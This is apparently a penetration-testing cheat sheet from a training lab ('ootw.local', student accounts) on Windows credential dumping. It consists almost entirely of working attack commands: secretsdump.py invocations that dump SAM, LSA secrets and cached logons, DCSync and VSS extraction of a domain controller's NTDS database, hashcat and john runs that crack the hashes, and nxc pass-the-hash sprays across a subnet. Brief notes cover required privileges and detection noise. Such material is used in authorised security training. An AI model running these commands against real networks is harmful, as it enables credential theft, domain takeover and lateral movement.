Host secret dumping targets local credential stores. On workstations and servers, we usually dump SAM, LSA secrets, and cached domain logons. On a domain controller, we target NTDS either through DCSync, VSS, or offline files.
Dump a member host with plaintext credentials
secretsdump.py 'ootw.local/student:student@10.10.10.201'
Dump a member host with pass-the-hash
secretsdump.py 'ootw.local/student@10.10.10.201' -hashes :NTLM_HASH
Dump a member host with Kerberos
export KRB5CCNAME=student.ccache
secretsdump.py -k -no-pass 'ootw.local/student@ws01.ootw.local'
Expected member-host output
SAM hashes
LSA secrets
Cached domain logons
DPAPI system material
Service account material when present
Dump DC with DRSUAPI
secretsdump.py 'ootw.local/Administrator:Student123!@10.10.10.200' -just-dc -dc-ip 10.10.10.200 -outputfile ntds
Dump DC with VSS
secretsdump.py 'ootw.local/Administrator:Student123!@10.10.10.200' -use-vss -dc-ip 10.10.10.200 -outputfile ntds_vss
Offline local hive parsing
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Offline NTDS parsing
secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
Crack extracted hashes
hashcat -m 1000 hashes.ntlm /usr/share/wordlists/rockyou.txt
hashcat -m 2100 hashes.mscache2 /usr/share/wordlists/rockyou.txt
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.ntlm
Use extracted NTLM
nxc smb 10.10.10.0/24 -u localadmin -H NTLM_HASH --local-auth
nxc smb 10.10.10.0/24 -d ootw.local -u domainuser -H NTLM_HASH
Notes
Local admin is enough for SAM/LSA on a member host. Domain replication rights or DC-level access is needed for domain credential material.
-use-vss is noisy because it creates shadow-copy activity. DRSUAPI/DCSync is also high-signal when performed by an unexpected account.